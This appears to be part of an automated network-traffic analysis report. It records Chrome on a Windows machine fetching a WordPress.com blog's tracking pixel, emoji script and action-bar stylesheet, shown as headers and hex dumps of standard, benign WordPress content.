                                                                                                                                                                                                                                                                  Content-Type: image/gif
                                                                                                                                                                                                                                                                  Content-Length: 50
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                  2024-10-29 19:09:44 UTC50INData Raw: 47 49 46 38 39 61 06 00 05 00 80 01 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c 00 00 00 00 06 00 05 00 00 02 09 0c 62 78 89 cd 6a 80 0c 05 00 3b
                                                                                                                                                                                                                                                                  Data Ascii: GIF89a!,bxj;


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  33192.168.2.1649741192.0.76.34437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:09:44 UTC659OUTGET /t.gif?is_current_user_blog_owner=false&_en=wpcom_marketing_bar_impression&_ui=17YqG79Brj34dSgrHP4bzBgK&_ut=anon&_ts=1730228981995&_tz=4&_lg=en-US&_pf=Win32&_ht=1024&_wd=1280&_sx=0&_sy=0&_dl=https%3A%2F%2Fdartergary.wordpress.com%2F&_dr=&blog_id=238502921&blog_tz=-4&user_lang=en&blog_lang=en&user_id=0&_rt=1730228981996&_=_ HTTP/1.1
                                                                                                                                                                                                                                                                  Host: pixel.wp.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  2024-10-29 19:09:44 UTC222INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:09:44 GMT
                                                                                                                                                                                                                                                                  Content-Type: image/gif
                                                                                                                                                                                                                                                                  Content-Length: 43
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                  2024-10-29 19:09:44 UTC43INData Raw: 47 49 46 38 39 61 01 00 01 00 80 01 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c 00 00 00 00 01 00 01 00 00 02 02 4c 01 00 3b
                                                                                                                                                                                                                                                                  Data Ascii: GIF89a!,L;


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  34192.168.2.1649745192.0.77.324437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:09:44 UTC403OUTGET /wp-includes/js/wp-emoji-release.min.js?m=1719498190i&ver=6.7-RC1-59308 HTTP/1.1
                                                                                                                                                                                                                                                                  Host: s2.wp.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  2024-10-29 19:09:44 UTC505INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:09:44 GMT
                                                                                                                                                                                                                                                                  Content-Type: application/javascript
                                                                                                                                                                                                                                                                  Content-Length: 18726
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Last-Modified: Thu, 27 Jun 2024 14:23:20 GMT
                                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                                  ETag: "667d75d8-4926"
                                                                                                                                                                                                                                                                  Expires: Wed, 29 Oct 2025 11:21:04 GMT
                                                                                                                                                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                                                                                                                                                  X-ac: 4.dfw _dfw MISS
                                                                                                                                                                                                                                                                  Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                  Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                  X-nc: HIT dfw 1
                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                  2024-10-29 19:09:44 UTC864INData Raw: 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 2f 2f 20 53 6f 75 72 63 65 3a 20 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 74 77 65 6d 6f 6a 69 2e 6d 69 6e 2e 6a 73 0a 76 61 72 20 74 77 65 6d 6f 6a 69 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 68 3d 7b 62 61 73 65 3a 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 73 64 65 6c 69 76 72 2e 6e 65 74 2f 67 68 2f 6a 64 65 63 6b 65 64 2f 74 77 65 6d 6f 6a 69 40 31 35 2e 30 2e 33 2f 61 73 73 65 74 73 2f 22 2c 65 78 74 3a 22 2e 70 6e 67 22 2c 73 69 7a 65 3a 22 37 32 78 37 32 22 2c 63 6c 61 73 73 4e 61 6d 65 3a 22 65 6d 6f 6a 69 22 2c 63 6f 6e 76 65 72 74 3a 7b 66 72 6f 6d 43 6f 64 65 50 6f 69 6e 74 3a 66 75 6e 63 74
                                                                                                                                                                                                                                                                  Data Ascii: /*! This file is auto-generated */// Source: wp-includes/js/twemoji.min.jsvar twemoji=function(){"use strict";var h={base:"https://cdn.jsdelivr.net/gh/jdecked/twemoji@15.0.3/assets/",ext:".png",size:"72x72",className:"emoji",convert:{fromCodePoint:funct
                                                                                                                                                                                                                                                                  2024-10-29 19:09:44 UTC1369INData Raw: 26 28 63 3d 63 2e 63 6f 6e 63 61 74 28 22 20 22 2c 66 2c 27 3d 22 27 2c 75 5b 66 5d 2e 72 65 70 6c 61 63 65 28 74 2c 72 29 2c 27 22 27 29 29 3b 63 3d 63 2e 63 6f 6e 63 61 74 28 22 2f 3e 22 29 7d 72 65 74 75 72 6e 20 63 7d 29 7d 3a 66 75 6e 63 74 69 6f 6e 28 64 2c 75 29 7b 76 61 72 20 66 2c 63 2c 65 2c 62 2c 61 2c 74 2c 72 2c 6e 2c 6f 2c 73 2c 69 2c 6c 3d 66 75 6e 63 74 69 6f 6e 20 64 28 75 2c 66 29 7b 76 61 72 20 63 2c 65 2c 62 3d 75 2e 63 68 69 6c 64 4e 6f 64 65 73 2c 61 3d 62 2e 6c 65 6e 67 74 68 3b 66 6f 72 28 3b 61 2d 2d 3b 29 63 3d 62 5b 61 5d 2c 33 3d 3d 3d 28 65 3d 63 2e 6e 6f 64 65 54 79 70 65 29 3f 66 2e 70 75 73 68 28 63 29 3a 31 21 3d 3d 65 7c 7c 22 6f 77 6e 65 72 53 56 47 45 6c 65 6d 65 6e 74 22 69 6e 20 63 7c 7c 6d 2e 74 65 73 74 28 63 2e 6e
                                                                                                                                                                                                                                                                  Data Ascii: &(c=c.concat(" ",f,'="',u[f].replace(t,r),'"'));c=c.concat("/>")}return c})}:function(d,u){var f,c,e,b,a,t,r,n,o,s,i,l=function d(u,f){var c,e,b=u.childNodes,a=b.length;for(;a--;)c=b[a],3===(e=c.nodeType)?f.push(c):1!==e||"ownerSVGElement"in c||m.test(c.n
                                                                                                                                                                                                                                                                  2024-10-29 19:09:44 UTC1369INData Raw: 5c 75 32 30 30 64 5c 75 32 37 36 34 5c 75 66 65 30 66 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 38 62 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 36 38 5c 75 64 38 33 63 5b 5c 75 64 66 66 62 2d 5c 75 64 66 66 66 5d 7c 5c 75 64 38 33 64 5c 75 64 63 36 38 5c 75 64 38 33 63 5c 75 64 66 66 63 5c 75 32 30 30 64 5c 75 32 37 36 34 5c 75 66 65 30 66 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 38 62 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 36 38 5c 75 64 38 33 63 5b 5c 75 64 66 66 62 2d 5c 75 64 66 66 66 5d 7c 5c 75 64 38 33 64 5c 75 64 63 36 38 5c 75 64 38 33 63 5c 75 64 66 66 64 5c 75 32 30 30 64 5c 75 32 37 36 34 5c 75 66 65 30 66 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 38 62 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 36 38 5c
                                                                                                                                                                                                                                                                  Data Ascii: \u200d\u2764\ufe0f\u200d\ud83d\udc8b\u200d\ud83d\udc68\ud83c[\udffb-\udfff]|\ud83d\udc68\ud83c\udffc\u200d\u2764\ufe0f\u200d\ud83d\udc8b\u200d\ud83d\udc68\ud83c[\udffb-\udfff]|\ud83d\udc68\ud83c\udffd\u200d\u2764\ufe0f\u200d\ud83d\udc8b\u200d\ud83d\udc68\
                                                                                                                                                                                                                                                                  2024-10-29 19:09:44 UTC1369INData Raw: 75 64 66 66 66 5d 7c 5c 75 64 38 33 64 5c 75 64 63 36 39 5c 75 64 38 33 63 5c 75 64 66 66 66 5c 75 32 30 30 64 5c 75 32 37 36 34 5c 75 66 65 30 66 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 38 62 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 36 39 5c 75 64 38 33 63 5b 5c 75 64 66 66 62 2d 5c 75 64 66 66 66 5d 7c 5c 75 64 38 33 65 5c 75 64 64 64 31 5c 75 64 38 33 63 5c 75 64 66 66 62 5c 75 32 30 30 64 5c 75 32 37 36 34 5c 75 66 65 30 66 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 38 62 5c 75 32 30 30 64 5c 75 64 38 33 65 5c 75 64 64 64 31 5c 75 64 38 33 63 5b 5c 75 64 66 66 63 2d 5c 75 64 66 66 66 5d 7c 5c 75 64 38 33 65 5c 75 64 64 64 31 5c 75 64 38 33 63 5c 75 64 66 66 63 5c 75 32 30 30 64 5c 75 32 37 36 34 5c 75 66 65 30 66 5c 75 32 30 30 64
                                                                                                                                                                                                                                                                  Data Ascii: udfff]|\ud83d\udc69\ud83c\udfff\u200d\u2764\ufe0f\u200d\ud83d\udc8b\u200d\ud83d\udc69\ud83c[\udffb-\udfff]|\ud83e\uddd1\ud83c\udffb\u200d\u2764\ufe0f\u200d\ud83d\udc8b\u200d\ud83e\uddd1\ud83c[\udffc-\udfff]|\ud83e\uddd1\ud83c\udffc\u200d\u2764\ufe0f\u200d
                                                                                                                                                                                                                                                                  2024-10-29 19:09:44 UTC1369INData Raw: 5c 75 64 38 33 63 5b 5c 75 64 66 66 62 2d 5c 75 64 66 66 66 5d 7c 5c 75 64 38 33 64 5c 75 64 63 36 38 5c 75 64 38 33 63 5c 75 64 66 66 66 5c 75 32 30 30 64 5c 75 64 38 33 65 5c 75 64 64 31 64 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 36 38 5c 75 64 38 33 63 5b 5c 75 64 66 66 62 2d 5c 75 64 66 66 65 5d 7c 5c 75 64 38 33 64 5c 75 64 63 36 39 5c 75 64 38 33 63 5c 75 64 66 66 62 5c 75 32 30 30 64 5c 75 32 37 36 34 5c 75 66 65 30 66 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 36 38 5c 75 64 38 33 63 5b 5c 75 64 66 66 62 2d 5c 75 64 66 66 66 5d 7c 5c 75 64 38 33 64 5c 75 64 63 36 39 5c 75 64 38 33 63 5c 75 64 66 66 62 5c 75 32 30 30 64 5c 75 32 37 36 34 5c 75 66 65 30 66 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 36 39 5c 75 64 38 33 63 5b 5c 75
                                                                                                                                                                                                                                                                  Data Ascii: \ud83c[\udffb-\udfff]|\ud83d\udc68\ud83c\udfff\u200d\ud83e\udd1d\u200d\ud83d\udc68\ud83c[\udffb-\udffe]|\ud83d\udc69\ud83c\udffb\u200d\u2764\ufe0f\u200d\ud83d\udc68\ud83c[\udffb-\udfff]|\ud83d\udc69\ud83c\udffb\u200d\u2764\ufe0f\u200d\ud83d\udc69\ud83c[\u
                                                                                                                                                                                                                                                                  2024-10-29 19:09:44 UTC1369INData Raw: 66 66 66 5d 7c 5c 75 64 38 33 64 5c 75 64 63 36 39 5c 75 64 38 33 63 5c 75 64 66 66 65 5c 75 32 30 30 64 5c 75 64 38 33 65 5c 75 64 64 31 64 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 36 39 5c 75 64 38 33 63 5b 5c 75 64 66 66 62 2d 5c 75 64 66 66 64 5c 75 64 66 66 66 5d 7c 5c 75 64 38 33 64 5c 75 64 63 36 39 5c 75 64 38 33 63 5c 75 64 66 66 66 5c 75 32 30 30 64 5c 75 32 37 36 34 5c 75 66 65 30 66 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 36 38 5c 75 64 38 33 63 5b 5c 75 64 66 66 62 2d 5c 75 64 66 66 66 5d 7c 5c 75 64 38 33 64 5c 75 64 63 36 39 5c 75 64 38 33 63 5c 75 64 66 66 66 5c 75 32 30 30 64 5c 75 32 37 36 34 5c 75 66 65 30 66 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 36 39 5c 75 64 38 33 63 5b 5c 75 64 66 66 62 2d 5c 75 64 66 66 66
                                                                                                                                                                                                                                                                  Data Ascii: fff]|\ud83d\udc69\ud83c\udffe\u200d\ud83e\udd1d\u200d\ud83d\udc69\ud83c[\udffb-\udffd\udfff]|\ud83d\udc69\ud83c\udfff\u200d\u2764\ufe0f\u200d\ud83d\udc68\ud83c[\udffb-\udfff]|\ud83d\udc69\ud83c\udfff\u200d\u2764\ufe0f\u200d\ud83d\udc69\ud83c[\udffb-\udfff
                                                                                                                                                                                                                                                                  2024-10-29 19:09:44 UTC1369INData Raw: 64 38 33 64 5c 75 64 63 38 62 5c 75 32 30 30 64 5c 75 64 38 33 64 5b 5c 75 64 63 36 38 5c 75 64 63 36 39 5d 7c 5c 75 64 38 33 65 5c 75 64 65 66 31 5c 75 64 38 33 63 5c 75 64 66 66 62 5c 75 32 30 30 64 5c 75 64 38 33 65 5c 75 64 65 66 32 5c 75 64 38 33 63 5b 5c 75 64 66 66 63 2d 5c 75 64 66 66 66 5d 7c 5c 75 64 38 33 65 5c 75 64 65 66 31 5c 75 64 38 33 63 5c 75 64 66 66 63 5c 75 32 30 30 64 5c 75 64 38 33 65 5c 75 64 65 66 32 5c 75 64 38 33 63 5b 5c 75 64 66 66 62 5c 75 64 66 66 64 2d 5c 75 64 66 66 66 5d 7c 5c 75 64 38 33 65 5c 75 64 65 66 31 5c 75 64 38 33 63 5c 75 64 66 66 64 5c 75 32 30 30 64 5c 75 64 38 33 65 5c 75 64 65 66 32 5c 75 64 38 33 63 5b 5c 75 64 66 66 62 5c 75 64 66 66 63 5c 75 64 66 66 65 5c 75 64 66 66 66 5d 7c 5c 75 64 38 33 65 5c 75 64
                                                                                                                                                                                                                                                                  Data Ascii: d83d\udc8b\u200d\ud83d[\udc68\udc69]|\ud83e\udef1\ud83c\udffb\u200d\ud83e\udef2\ud83c[\udffc-\udfff]|\ud83e\udef1\ud83c\udffc\u200d\ud83e\udef2\ud83c[\udffb\udffd-\udfff]|\ud83e\udef1\ud83c\udffd\u200d\ud83e\udef2\ud83c[\udffb\udffc\udffe\udfff]|\ud83e\ud
                                                                                                                                                                                                                                                                  2024-10-29 19:09:44 UTC1369INData Raw: 64 64 34 5c 75 64 64 64 36 2d 5c 75 64 64 64 64 5d 29 28 3f 3a 5c 75 64 38 33 63 5b 5c 75 64 66 66 62 2d 5c 75 64 66 66 66 5d 29 3f 5c 75 32 30 30 64 5b 5c 75 32 36 34 30 5c 75 32 36 34 32 5d 5c 75 66 65 30 66 7c 28 3f 3a 5c 75 64 38 33 64 5c 75 64 63 36 38 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 36 38 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 36 36 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 36 36 7c 5c 75 64 38 33 64 5c 75 64 63 36 38 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 36 38 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 36 37 5c 75 32 30 30 64 5c 75 64 38 33 64 5b 5c 75 64 63 36 36 5c 75 64 63 36 37 5d 7c 5c 75 64 38 33 64 5c 75 64 63 36 38 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 36 39 5c 75 32 30 30 64 5c 75 64
                                                                                                                                                                                                                                                                  Data Ascii: dd4\uddd6-\udddd])(?:\ud83c[\udffb-\udfff])?\u200d[\u2640\u2642]\ufe0f|(?:\ud83d\udc68\u200d\ud83d\udc68\u200d\ud83d\udc66\u200d\ud83d\udc66|\ud83d\udc68\u200d\ud83d\udc68\u200d\ud83d\udc67\u200d\ud83d[\udc66\udc67]|\ud83d\udc68\u200d\ud83d\udc69\u200d\ud
                                                                                                                                                                                                                                                                  2024-10-29 19:09:44 UTC1369INData Raw: 5c 75 64 38 33 64 5c 75 64 63 61 62 7c 5c 75 64 38 33 65 5c 75 64 64 33 63 5c 75 32 30 30 64 5c 75 32 36 34 30 5c 75 66 65 30 66 7c 5c 75 64 38 33 65 5c 75 64 64 33 63 5c 75 32 30 30 64 5c 75 32 36 34 32 5c 75 66 65 30 66 7c 5c 75 64 38 33 65 5c 75 64 64 64 65 5c 75 32 30 30 64 5c 75 32 36 34 30 5c 75 66 65 30 66 7c 5c 75 64 38 33 65 5c 75 64 64 64 65 5c 75 32 30 30 64 5c 75 32 36 34 32 5c 75 66 65 30 66 7c 5c 75 64 38 33 65 5c 75 64 64 64 66 5c 75 32 30 30 64 5c 75 32 36 34 30 5c 75 66 65 30 66 7c 5c 75 64 38 33 65 5c 75 64 64 64 66 5c 75 32 30 30 64 5c 75 32 36 34 32 5c 75 66 65 30 66 7c 5c 75 64 38 33 64 5c 75 64 63 30 38 5c 75 32 30 30 64 5c 75 32 62 31 62 7c 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 29 7c 5b 23 2a 30 2d
                                                                                                                                                                                                                                                                  Data Ascii: \ud83d\udcab|\ud83e\udd3c\u200d\u2640\ufe0f|\ud83e\udd3c\u200d\u2642\ufe0f|\ud83e\uddde\u200d\u2640\ufe0f|\ud83e\uddde\u200d\u2642\ufe0f|\ud83e\udddf\u200d\u2640\ufe0f|\ud83e\udddf\u200d\u2642\ufe0f|\ud83d\udc08\u200d\u2b1b|\ud83d\udc26\u200d\u2b1b)|[#*0-
                                                                                                                                                                                                                                                                  2024-10-29 19:09:44 UTC1369INData Raw: 30 33 64 5c 75 33 32 39 37 5c 75 33 32 39 39 5d 29 28 3f 3a 5c 75 66 65 30 66 7c 28 3f 21 5c 75 66 65 30 65 29 29 7c 28 3f 3a 28 3f 3a 5c 75 64 38 33 63 5b 5c 75 64 66 63 62 5c 75 64 66 63 63 5d 7c 5c 75 64 38 33 64 5b 5c 75 64 64 37 34 5c 75 64 64 37 35 5c 75 64 64 39 30 5d 7c 5c 75 64 38 33 65 5c 75 64 65 66 30 7c 5b 5c 75 32 36 31 64 5c 75 32 36 66 37 5c 75 32 36 66 39 5c 75 32 37 30 63 5c 75 32 37 30 64 5d 29 28 3f 3a 5c 75 66 65 30 66 7c 28 3f 21 5c 75 66 65 30 65 29 29 7c 28 3f 3a 5c 75 64 38 33 63 5b 5c 75 64 66 38 35 5c 75 64 66 63 32 2d 5c 75 64 66 63 34 5c 75 64 66 63 37 5c 75 64 66 63 61 5d 7c 5c 75 64 38 33 64 5b 5c 75 64 63 34 32 5c 75 64 63 34 33 5c 75 64 63 34 36 2d 5c 75 64 63 35 30 5c 75 64 63 36 36 2d 5c 75 64 63 36 39 5c 75 64 63 36 65
                                                                                                                                                                                                                                                                  Data Ascii: 03d\u3297\u3299])(?:\ufe0f|(?!\ufe0e))|(?:(?:\ud83c[\udfcb\udfcc]|\ud83d[\udd74\udd75\udd90]|\ud83e\udef0|[\u261d\u26f7\u26f9\u270c\u270d])(?:\ufe0f|(?!\ufe0e))|(?:\ud83c[\udf85\udfc2-\udfc4\udfc7\udfca]|\ud83d[\udc42\udc43\udc46-\udc50\udc66-\udc69\udc6e


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  35192.168.2.1649746192.0.77.324437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:09:44 UTC587OUTGET /wp-content/mu-plugins/actionbar/actionbar.css?v=20241015 HTTP/1.1
                                                                                                                                                                                                                                                                  Host: s0.wp.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                  Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                                  Referer: https://dartergary.wordpress.com/
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  2024-10-29 19:09:44 UTC468INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:09:44 GMT
                                                                                                                                                                                                                                                                  Content-Type: text/css
                                                                                                                                                                                                                                                                  Content-Length: 15773
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                                  x-minify: t
                                                                                                                                                                                                                                                                  x-minify-cache: hit
                                                                                                                                                                                                                                                                  etag: W/18626-1729026647633.8218
                                                                                                                                                                                                                                                                  Expires: Wed, 15 Oct 2025 21:11:37 GMT
                                                                                                                                                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                                                                                                                                                  X-ac: 4.dfw _dfw MISS
                                                                                                                                                                                                                                                                  Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                  Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                  X-nc: HIT dfw 2
                                                                                                                                                                                                                                                                  2024-10-29 19:09:44 UTC901INData Raw: 64 69 76 23 61 63 74 69 6f 6e 62 61 72 20 2e 6e 6f 2d 64 69 73 70 6c 61 79 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 64 69 76 23 61 63 74 69 6f 6e 62 61 72 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6f 75 74 6c 69 6e 65 3a 30 3b 2d 77 65 62 6b 69 74 2d 74 61 70 2d 68 69 67 68 6c 69 67 68 74 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 75 73 65 72 2d 73 65 6c 65 63 74 3a 6e 6f 6e 65 3b 2d 77 65 62 6b 69 74 2d 75 73 65 72 2d 73 65 6c 65 63 74 3a 6e 6f 6e 65 7d 64 69 76 23 61 63 74 69 6f 6e 62 61 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 70 6f 73 69 74 69 6f 6e 3a 66 69 78 65 64 3b 62 6f 74 74 6f 6d 3a 31 30 70 78 3b 72 69 67 68 74 3a 31 30 70 78 3b 62 6f 72 64 65 72 3a 73
                                                                                                                                                                                                                                                                  Data Ascii: div#actionbar .no-display{display:none!important}div#actionbar *{box-sizing:border-box;outline:0;-webkit-tap-highlight-color:transparent;user-select:none;-webkit-user-select:none}div#actionbar{background:#fff;position:fixed;bottom:10px;right:10px;border:s
                                                                                                                                                                                                                                                                  2024-10-29 19:09:44 UTC1369INData Raw: 61 74 65 33 64 28 30 2c 31 35 30 70 78 2c 30 29 3b 2d 6d 6f 7a 2d 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 33 64 28 30 2c 31 35 30 70 78 2c 30 29 3b 2d 6f 2d 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 33 64 28 30 2c 31 35 30 70 78 2c 30 29 3b 2d 6d 73 2d 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 33 64 28 30 2c 31 35 30 70 78 2c 30 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 33 64 28 30 2c 31 35 30 70 78 2c 30 29 7d 64 69 76 23 61 63 74 69 6f 6e 62 61 72 2e 61 63 74 6e 62 72 2d 66 6f 6c 64 65 64 7b 6f 70 61 63 69 74 79 3a 2e 37 7d 64 69 76 23 61 63 74 69 6f 6e 62 61 72 2e 61 63 74 6e 62 72 2d 66 6f 6c 64 65 64 3a 68 6f 76 65 72 7b 6f 70 61 63 69 74 79 3a 31 7d 64 69 76 23 61 63 74 69 6f 6e 62
                                                                                                                                                                                                                                                                  Data Ascii: ate3d(0,150px,0);-moz-transform:translate3d(0,150px,0);-o-transform:translate3d(0,150px,0);-ms-transform:translate3d(0,150px,0);transform:translate3d(0,150px,0)}div#actionbar.actnbr-folded{opacity:.7}div#actionbar.actnbr-folded:hover{opacity:1}div#actionb
                                                                                                                                                                                                                                                                  2024-10-29 19:09:44 UTC1369INData Raw: 66 69 6c 6c 3a 23 33 63 34 33 34 61 7d 64 69 76 23 61 63 74 69 6f 6e 62 61 72 20 6c 69 2e 61 63 74 6e 62 72 2d 62 74 6e 20 61 2e 61 63 74 6e 62 72 2d 61 63 74 6e 2d 66 6f 6c 6c 6f 77 69 6e 67 2c 64 69 76 23 61 63 74 69 6f 6e 62 61 72 20 6c 69 2e 61 63 74 6e 62 72 2d 62 74 6e 20 61 2e 61 63 74 6e 62 72 2d 61 63 74 6e 2d 66 6f 6c 6c 6f 77 69 6e 67 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 30 30 38 61 32 30 7d 64 69 76 23 61 63 74 69 6f 6e 62 61 72 20 6c 69 2e 61 63 74 6e 62 72 2d 62 74 6e 20 61 2e 61 63 74 6e 62 72 2d 61 63 74 6e 2d 66 6f 6c 6c 6f 77 69 6e 67 20 2e 67 72 69 64 69 63 6f 6e 2c 64 69 76 23 61 63 74 69 6f 6e 62 61 72 20 6c 69 2e 61 63 74 6e 62 72 2d 62 74 6e 20 61 2e 61 63 74 6e 62 72 2d 61 63 74 6e 2d 66 6f 6c 6c 6f 77 69 6e 67 3a 68 6f 76 65
                                                                                                                                                                                                                                                                  Data Ascii: fill:#3c434a}div#actionbar li.actnbr-btn a.actnbr-actn-following,div#actionbar li.actnbr-btn a.actnbr-actn-following:hover{color:#008a20}div#actionbar li.actnbr-btn a.actnbr-actn-following .gridicon,div#actionbar li.actnbr-btn a.actnbr-actn-following:hove
